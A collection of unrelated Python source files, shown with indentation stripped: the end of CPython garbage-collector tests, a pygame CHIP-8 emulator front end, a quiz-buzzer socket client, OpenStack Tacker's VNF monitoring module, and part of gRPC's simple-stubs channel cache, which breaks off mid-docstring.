self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
main.py | from sys import exit as sysexit
from os import environ, getcwd
from threading import Thread
from tkinter import Tk, filedialog
import pygame
import chip8
CHIP8 = chip8.CPU()
pygame.init()
root = Tk(); root.withdraw()
environ['SDL_VIDEO_CENTERED'] = '1'
width, height = 1280, 720
scaleMult = 12
screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
pygame.display.set_caption("CHIP-8")
clock = pygame.time.Clock()
emulatorClock = pygame.time.Clock()
emulationSurface = pygame.Surface((64*scaleMult, 32*scaleMult), pygame.HWSURFACE)
black, white = (0,0,0), (255,255,255)
bgcolor = (57,68,82)
mfont = pygame.font.SysFont("Calibri", 24)
keyReference = [pygame.K_x,
pygame.K_1, pygame.K_2, pygame.K_3, pygame.K_q, pygame.K_w, pygame.K_e, pygame.K_a, pygame.K_s, pygame.K_d, pygame.K_z, pygame.K_c, pygame.K_4, pygame.K_r, pygame.K_f, pygame.K_v]
UIbuttonsReference = [( pygame.Rect(50,450,120,50), (mfont.render("Open ROM", True, white, black), (55, 465)) ), ( pygame.Rect(190,450,120,50), (mfont.render("Reset ROM", True, white, black), (195, 465)) )]
keyButtonsReference = [( pygame.Rect(50,550,25,25), "1" ), ( pygame.Rect(80,550,25,25), "2" ), ( pygame.Rect(110,550,25,25), "3" ), ( pygame.Rect(140,550,25,25), "C" ),
( pygame.Rect(50,580,25,25), "4" ), ( pygame.Rect(80,580,25,25), "5" ), ( pygame.Rect(110,580,25,25), "6" ), ( pygame.Rect(140,580,25,25), "D" ),
( pygame.Rect(50,610,25,25), "7" ), ( pygame.Rect(80,610,25,25), "8" ), ( pygame.Rect(110,610,25,25), "9" ), ( pygame.Rect(140,610,25,25), "E" ),
( pygame.Rect(50,640,25,25), "A" ), ( pygame.Rect(80,640,25,25), "0" ), ( pygame.Rect(110,640,25,25), "B" ), ( pygame.Rect(140,640,25,25), "F" )]
def drawDebug():
s = pygame.Surface((300, 600), pygame.HWSURFACE)
s.fill(bgcolor)
s.blit(mfont.render(( "PC: " + "x" + hex(CHIP8.pc)[2::].upper() ), True, white, bgcolor), (10,0))
s.blit(mfont.render(( "Opcode: " + "x" + hex(CHIP8.opcode)[2::].upper() ), True, white, bgcolor), (10,20))
s.blit(mfont.render(( "I: " + "x" + hex(CHIP8.I)[2::].upper() ), True, white, bgcolor), (10,40))
for i in range(16):
s.blit(mfont.render( ("V" + hex(i)[-1].upper() + ": " + "x" + hex(CHIP8.V[i])[2::].upper() ), True, white, bgcolor), (10 + 120*(i//8), 80 + (i % 8)*20))
return s
def drawHandleUI():
if instructionAdvance:
screen.blit(mfont.render("Paused", True, (240, 15, 15), bgcolor), (50, 20))
for b in UIbuttonsReference:
pygame.draw.rect(screen, black, b[0])
if b[1]:
screen.blit(b[1][0], b[1][1])
for mb in keyButtonsReference:
tempbgcol = black if CHIP8.key[int(mb[1], 16)] == 0 else (80,80,80)
pygame.draw.rect(screen, tempbgcol, mb[0])
screen.blit(mfont.render(mb[1], True, white, tempbgcol), (mb[0].x + 6, mb[0].y + 1))
instructionAdvance = False
resetROM = False
def runEmulator():
global resetROM, instructionAdvance
while True:
if not instructionAdvance:
CHIP8.emulationCycle()
if resetROM:
CHIP8.reInit()
CHIP8.loadGame(ROMname)
resetROM = False
emulatorClock.tick(300)
ROMname = getcwd() + "\\roms\\" + "TETRIS"
CHIP8.loadGame(ROMname)
emulationThread = Thread(target=runEmulator)
emulationThread.start()
while True:
activekeys = pygame.key.get_pressed()
mousex, mousey = pygame.mouse.get_pos()
for event in pygame.event.get():
if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):
pygame.quit()
emulationThread.join()
sysexit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
CHIP8.emulationCycle()
elif event.key == pygame.K_p:
instructionAdvance = not instructionAdvance
elif event.type == pygame.MOUSEBUTTONDOWN:
if UIbuttonsReference[0][0].collidepoint(mousex, mousey):
ROMname = filedialog.askopenfile().name
resetROM = True
elif UIbuttonsReference[1][0].collidepoint(mousex, mousey):
resetROM = True
for i in range(16):
CHIP8.key[i] = activekeys[keyReference[i]]
screen.fill(bgcolor)
emulationSurface.fill((0,0,0))
for pixelY in range(32):
for pixelX in range(64):
pygame.draw.rect(emulationSurface, (black if CHIP8.gfx[(pixelY * 64) + pixelX] == 0 else white), pygame.Rect(pixelX*scaleMult, pixelY*scaleMult, scaleMult, scaleMult))
screen.blit(emulationSurface, (50,50))
screen.blit(drawDebug(), (830, 50))
drawHandleUI()
pygame.display.update()
clock.tick(60)
|
client.py | SERVER_IP = ''
SERVER_PORT = 1644
import select
import threading
import sys
import random
import time
import socket
import termios
try:
def Message_recv(s,killRequest):
while not killRequest.isSet():
r, w, x = select.select([s], [], [])
data = r[0].recv(1024)
print data
if data:
killRequest.set()
def Message_send(s, userid, killRequest, youBuzzed):
while not killRequest.isSet():
r, w, x = select.select([sys.stdin], [], [], 0.02)
if r:
s.send(str(userid))
youBuzzed.set()
time.sleep(0.01)
break
serverip = SERVER_IP
serverport = SERVER_PORT
clientport = random.randint(2000, 3000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', clientport))
s.connect((serverip, serverport))
userid = s.recv(1024)
print "Hello. Your player number is : ", userid
win_score = s.recv(1024)
print "Press buzzer first to answer first. Score required to win is : ", win_score
continue_next_round = 1
while continue_next_round:
question = s.recv(1024)
killRequest = threading.Event()
youBuzzed = threading.Event()
sendThread = threading.Thread(target = Message_send, args = [s, userid, killRequest, youBuzzed])
receiveThread = threading.Thread(target = Message_recv, args = [s, killRequest])
time.sleep(0.1)
print "Question:", question
print "Buzzer Round"
s.setblocking(0)
sendThread.start()
receiveThread.start()
receiveThread.join()
sendThread.join()
s.setblocking(1)
termios.tcflush(sys.stdin, termios.TCIOFLUSH)
time.sleep(0.01)
if youBuzzed.isSet():
print "Answer the question : "
givenAnswer = raw_input()
s.send(givenAnswer)
else:
givenAnswer = s.recv(1024)
print "Answer selected is :", givenAnswer
is_correct_str = s.recv(1024)
time.sleep(0.001)
print is_correct_str
trueAnswer = s.recv(1024)
print "Correct answer is:",trueAnswer
tally = s.recv(1024)
tally = tally.split()
print "Score of player"
for i in range(len(tally)):
print i, tally[i]
continue_next_round = s.recv(1024)
continue_next_round = int(continue_next_round)
final_message = s.recv(1024)
print final_message
except Exception as e:
print e
finally:
s.close()
|
monitor.py | # Copyright 2015 Intel Corporation.
# All Rights Reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import inspect
import threading
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from tacker.common import driver_manager
from tacker import context as t_context
from tacker.db.common_services import common_services_db_plugin
from tacker.plugins.common import constants
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
OPTS = [
cfg.IntOpt('check_intvl',
default=10,
help=_("check interval for monitor")),
]
CONF.register_opts(OPTS, group='monitor')
def config_opts():
return [('monitor', OPTS),
('tacker', VNFMonitor.OPTS),
('tacker', VNFAlarmMonitor.OPTS),
('tacker', VNFAppMonitor.OPTS)]
def _log_monitor_events(context, vnf_dict, evt_details):
_cos_db_plg = common_services_db_plugin.CommonServicesPluginDb()
_cos_db_plg.create_event(context, res_id=vnf_dict['id'],
res_type=constants.RES_TYPE_VNF,
res_state=vnf_dict['status'],
evt_type=constants.RES_EVT_MONITOR,
tstamp=timeutils.utcnow(),
details=evt_details)
class VNFMonitor(object):
"""VNF Monitor."""
_instance = None
_hosting_vnfs = dict() # vnf_id => dict of parameters
_status_check_intvl = 0
_lock = threading.RLock()
OPTS = [
cfg.ListOpt(
'monitor_driver', default=['ping', 'http_ping'],
help=_('Monitor driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __new__(cls, boot_wait, check_intvl=None):
if not cls._instance:
cls._instance = super(VNFMonitor, cls).__new__(cls)
return cls._instance
def __init__(self, boot_wait, check_intvl=None):
self._monitor_manager = driver_manager.DriverManager(
'tacker.tacker.monitor.drivers',
cfg.CONF.tacker.monitor_driver)
self.boot_wait = boot_wait
if check_intvl is None:
check_intvl = cfg.CONF.monitor.check_intvl
self._status_check_intvl = check_intvl
LOG.debug('Spawning VNF monitor thread')
threading.Thread(target=self.__run__).start()
def __run__(self):
while(1):
time.sleep(self._status_check_intvl)
with self._lock:
for hosting_vnf in VNFMonitor._hosting_vnfs.values():
if hosting_vnf.get('dead', False):
LOG.debug('monitor skips dead vnf %s', hosting_vnf)
continue
self.run_monitor(hosting_vnf)
@staticmethod
def to_hosting_vnf(vnf_dict, action_cb):
return {
'id': vnf_dict['id'],
'management_ip_addresses': jsonutils.loads(
vnf_dict['mgmt_url']),
'action_cb': action_cb,
'vnf': vnf_dict,
'monitoring_policy': jsonutils.loads(
vnf_dict['attributes']['monitoring_policy'])
}
def add_hosting_vnf(self, new_vnf):
LOG.debug('Adding host %(id)s, Mgmt IP %(ips)s',
{'id': new_vnf['id'],
'ips': new_vnf['management_ip_addresses']})
new_vnf['boot_at'] = timeutils.utcnow()
with self._lock:
VNFMonitor._hosting_vnfs[new_vnf['id']] = new_vnf
attrib_dict = new_vnf['vnf']['attributes']
mon_policy_dict = attrib_dict['monitoring_policy']
evt_details = (("VNF added for monitoring. "
"mon_policy_dict = %s,") % (mon_policy_dict))
_log_monitor_events(t_context.get_admin_context(), new_vnf['vnf'],
evt_details)
def delete_hosting_vnf(self, vnf_id):
LOG.debug('deleting vnf_id %(vnf_id)s', {'vnf_id': vnf_id})
with self._lock:
hosting_vnf = VNFMonitor._hosting_vnfs.pop(vnf_id, None)
if hosting_vnf:
LOG.debug('deleting vnf_id %(vnf_id)s, Mgmt IP %(ips)s',
{'vnf_id': vnf_id,
'ips': hosting_vnf['management_ip_addresses']})
def run_monitor(self, hosting_vnf):
mgmt_ips = hosting_vnf['management_ip_addresses']
vdupolicies = hosting_vnf['monitoring_policy']['vdus']
vnf_delay = hosting_vnf['monitoring_policy'].get(
'monitoring_delay', self.boot_wait)
for vdu in vdupolicies.keys():
if hosting_vnf.get('dead'):
return
policy = vdupolicies[vdu]
for driver in policy.keys():
params = policy[driver].get('monitoring_params', {})
vdu_delay = params.get('monitoring_delay', vnf_delay)
if not timeutils.is_older_than(
hosting_vnf['boot_at'],
vdu_delay):
continue
actions = policy[driver].get('actions', {})
if 'mgmt_ip' not in params:
params['mgmt_ip'] = mgmt_ips[vdu]
driver_return = self.monitor_call(driver,
hosting_vnf['vnf'],
params)
LOG.debug('driver_return %s', driver_return)
if driver_return in actions:
action = actions[driver_return]
hosting_vnf['action_cb'](action)
def mark_dead(self, vnf_id):
VNFMonitor._hosting_vnfs[vnf_id]['dead'] = True
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._monitor_manager.invoke(
driver, method, **kwargs)
def monitor_get_config(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_url(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_call(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
class VNFAppMonitor(object):
"""VNF App monitor"""
OPTS = [
cfg.ListOpt(
'app_monitor_driver', default=['zabbix'],
help=_('App monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __init__(self):
self._application_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.app_monitor.drivers',
cfg.CONF.tacker.app_monitor_driver)
def _create_app_monitoring_dict(self, dev_attrs, mgmt_url):
app_policy = 'app_monitoring_policy'
appmonitoring_dict = ast.literal_eval(dev_attrs[app_policy])
vdulist = appmonitoring_dict['vdus'].keys()
for vduname in vdulist:
temp = ast.literal_eval(mgmt_url)
appmonitoring_dict['vdus'][vduname]['mgmt_ip'] = temp[vduname]
return appmonitoring_dict
def create_app_dict(self, context, vnf_dict):
dev_attrs = vnf_dict['attributes']
mgmt_url = vnf_dict['mgmt_url']
return self._create_app_monitoring_dict(dev_attrs, mgmt_url)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._application_monitor_manager.\
invoke(driver, method, **kwargs)
def add_to_appmonitor(self, applicationvnfdict, vnf_dict):
vdunode = applicationvnfdict['vdus'].keys()
driver = applicationvnfdict['vdus'][vdunode[0]]['name']
kwargs = applicationvnfdict
return self._invoke(driver, vnf=vnf_dict, kwargs=kwargs)
class VNFAlarmMonitor(object):
"""VNF Alarm monitor"""
OPTS = [
cfg.ListOpt(
'alarm_monitor_driver', default=['ceilometer'],
help=_('Alarm monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
# get alarm here
def __init__(self):
self._alarm_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.alarm_monitor.drivers',
cfg.CONF.tacker.alarm_monitor_driver)
def update_vnf_with_alarm(self, plugin, context, vnf, policy_dict):
triggers = policy_dict['triggers']
alarm_url = dict()
for trigger_name, trigger_dict in triggers.items():
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = trigger_name
driver = trigger_dict['event_type']['implementation']
# TODO(Tung Doan) trigger_dict.get('actions') needs to be used
policy_action = trigger_dict.get('action')
if len(policy_action) == 0:
_log_monitor_events(t_context.get_admin_context(),
vnf,
"Alarm not set: policy action missing")
return
# Other backend policies with the construct (policy, action)
# ex: (SP1, in), (SP1, out)
def _refactor_backend_policy(bk_policy_name, bk_action_name):
policy = '%(policy_name)s-%(action_name)s' % {
'policy_name': bk_policy_name,
'action_name': bk_action_name}
return policy
for index, policy_action_name in enumerate(policy_action):
filters = {'name': policy_action_name}
bkend_policies =\
plugin.get_vnf_policies(context, vnf['id'], filters)
if bkend_policies:
bkend_policy = bkend_policies[0]
if bkend_policy['type'] == constants.POLICY_SCALING:
cp = trigger_dict['condition'].\
get('comparison_operator')
scaling_type = 'out' if cp == 'gt' else 'in'
policy_action[index] = _refactor_backend_policy(
policy_action_name, scaling_type)
# Support multiple action. Ex: respawn % notify
action_name = '%'.join(policy_action)
params['mon_policy_action'] = action_name
alarm_url[trigger_name] =\
self.call_alarm_url(driver, vnf, params)
details = "Alarm URL set successfully: %s" % alarm_url
_log_monitor_events(t_context.get_admin_context(),
vnf,
details)
return alarm_url
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
mon_prop = trigger['trigger']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
trigger_name, trigger_dict = list(mon_prop.items())[0]
driver = trigger_dict['event_type']['implementation']
return self.process_alarm(driver, vnf, alarm_dict)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._alarm_monitor_manager.invoke(
driver, method, **kwargs)
def call_alarm_url(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
def process_alarm(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
|
_simple_stubs.py | # Copyright 2020 The gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions that obviate explicit stubs and explicit channels."""
import collections
import datetime
import os
import logging
import threading
from typing import (Any, AnyStr, Callable, Dict, Iterator, Optional, Sequence,
Tuple, TypeVar, Union)
import grpc
from grpc.experimental import experimental_api
RequestType = TypeVar('RequestType')
ResponseType = TypeVar('ResponseType')
OptionsType = Sequence[Tuple[str, str]]
CacheKey = Tuple[str, OptionsType, Optional[grpc.ChannelCredentials],
Optional[grpc.Compression]]
_LOGGER = logging.getLogger(__name__)
_EVICTION_PERIOD_KEY = "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS"
if _EVICTION_PERIOD_KEY in os.environ:
_EVICTION_PERIOD = datetime.timedelta(
seconds=float(os.environ[_EVICTION_PERIOD_KEY]))
_LOGGER.debug("Setting managed channel eviction period to %s",
_EVICTION_PERIOD)
else:
_EVICTION_PERIOD = datetime.timedelta(minutes=10)
_MAXIMUM_CHANNELS_KEY = "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM"
if _MAXIMUM_CHANNELS_KEY in os.environ:
_MAXIMUM_CHANNELS = int(os.environ[_MAXIMUM_CHANNELS_KEY])
_LOGGER.debug("Setting maximum managed channels to %d", _MAXIMUM_CHANNELS)
else:
_MAXIMUM_CHANNELS = 2**8
_DEFAULT_TIMEOUT_KEY = "GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS"
if _DEFAULT_TIMEOUT_KEY in os.environ:
_DEFAULT_TIMEOUT = float(os.environ[_DEFAULT_TIMEOUT_KEY])
_LOGGER.debug("Setting default timeout seconds to %f", _DEFAULT_TIMEOUT)
else:
_DEFAULT_TIMEOUT = 60.0
def _create_channel(target: str, options: Sequence[Tuple[str, str]],
channel_credentials: Optional[grpc.ChannelCredentials],
compression: Optional[grpc.Compression]) -> grpc.Channel:
if channel_credentials is grpc.experimental.insecure_channel_credentials():
_LOGGER.debug(f"Creating insecure channel with options '{options}' " +
f"and compression '{compression}'")
return grpc.insecure_channel(target,
options=options,
compression=compression)
else:
_LOGGER.debug(
f"Creating secure channel with credentials '{channel_credentials}', "
+ f"options '{options}' and compression '{compression}'")
return grpc.secure_channel(target,
credentials=channel_credentials,
options=options,
compression=compression)
class ChannelCache:
# NOTE(rbellevi): Untyped due to reference cycle.
_singleton = None
_lock: threading.RLock = threading.RLock()
_condition: threading.Condition = threading.Condition(lock=_lock)
_eviction_ready: threading.Event = threading.Event()
_mapping: Dict[CacheKey, Tuple[grpc.Channel, datetime.datetime]]
_eviction_thread: threading.Thread
def __init__(self):
self._mapping = collections.OrderedDict()
self._eviction_thread = threading.Thread(
target=ChannelCache._perform_evictions, daemon=True)
self._eviction_thread.start()
@staticmethod
def get():
with ChannelCache._lock:
if ChannelCache._singleton is None:
ChannelCache._singleton = ChannelCache()
ChannelCache._eviction_ready.wait()
return ChannelCache._singleton
def _evict_locked(self, key: CacheKey):
channel, _ = self._mapping.pop(key)
_LOGGER.debug("Evicting channel %s with configuration %s.", channel,
key)
channel.close()
del channel
@staticmethod
def _perform_evictions():
while True:
with ChannelCache._lock:
ChannelCache._eviction_ready.set()
if not ChannelCache._singleton._mapping:
ChannelCache._condition.wait()
elif len(ChannelCache._singleton._mapping) > _MAXIMUM_CHANNELS:
key = next(iter(ChannelCache._singleton._mapping.keys()))
ChannelCache._singleton._evict_locked(key)
# And immediately reevaluate.
else:
key, (_, eviction_time) = next(
iter(ChannelCache._singleton._mapping.items()))
now = datetime.datetime.now()
if eviction_time <= now:
ChannelCache._singleton._evict_locked(key)
continue
else:
time_to_eviction = (eviction_time - now).total_seconds()
# NOTE: We aim to *eventually* coalesce to a state in
# which no overdue channels are in the cache and the
# length of the cache is longer than _MAXIMUM_CHANNELS.
# We tolerate momentary states in which these two
# criteria are not met.
ChannelCache._condition.wait(timeout=time_to_eviction)
def get_channel(self, target: str, options: Sequence[Tuple[str, str]],
channel_credentials: Optional[grpc.ChannelCredentials],
insecure: bool,
compression: Optional[grpc.Compression]) -> grpc.Channel:
if insecure and channel_credentials:
raise ValueError("The insecure option is mutually exclusive with " +
"the channel_credentials option. Please use one " +
"or the other.")
if insecure:
channel_credentials = grpc.experimental.insecure_channel_credentials(
)
elif channel_credentials is None:
_LOGGER.debug("Defaulting to SSL channel credentials.")
channel_credentials = grpc.ssl_channel_credentials()
key = (target, options, channel_credentials, compression)
with self._lock:
channel_data = self._mapping.get(key, None)
if channel_data is not None:
channel = channel_data[0]
self._mapping.pop(key)
self._mapping[key] = (channel, datetime.datetime.now() +
_EVICTION_PERIOD)
return channel
else:
channel = _create_channel(target, options, channel_credentials,
compression)
self._mapping[key] = (channel, datetime.datetime.now() +
_EVICTION_PERIOD)
if len(self._mapping) == 1 or len(
self._mapping) >= _MAXIMUM_CHANNELS:
self._condition.notify()
return channel
def _test_only_channel_count(self) -> int:
with self._lock:
return len(self._mapping)
@experimental_api
def unary_unary(
request: RequestType,
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
insecure: bool = False,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = _DEFAULT_TIMEOUT,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> ResponseType:
"""Invokes a unary-unary RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
from the cache after a fixed period by a background. Channels will also be
evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional :term:`serializer` for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional :term:`deserializer` for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (:term:`channel_arguments` in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials() or
grpc.insecure_channel_credentials().
insecure: If True, specifies channel_credentials as
:term:`grpc.insecure_channel_credentials()`. This option is mutually
exclusive with the `channel_credentials` option.
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to True.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised. If timeout is unspecified,
defaults to a timeout controlled by the
GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS environment variable. If that is
unset, defaults to 60 seconds. Supply a value of None to indicate that
no timeout should be enforced.
metadata: Optional metadata to send to the server.
Returns:
The response to the RPC.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, insecure,
compression)
multicallable = channel.unary_unary(method, request_serializer,
response_deserializer)
wait_for_ready = wait_for_ready if wait_for_ready is not None else True
return multicallable(request,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
@experimental_api
def unary_stream(
request: RequestType,
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
insecure: bool = False,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = _DEFAULT_TIMEOUT,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> Iterator[ResponseType]:
"""Invokes a unary-stream RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
from the cache after a fixed period by a background. Channels will also be
evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional :term:`serializer` for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional :term:`deserializer` for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (:term:`channel_arguments` in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
insecure: If True, specifies channel_credentials as
:term:`grpc.insecure_channel_credentials()`. This option is mutually
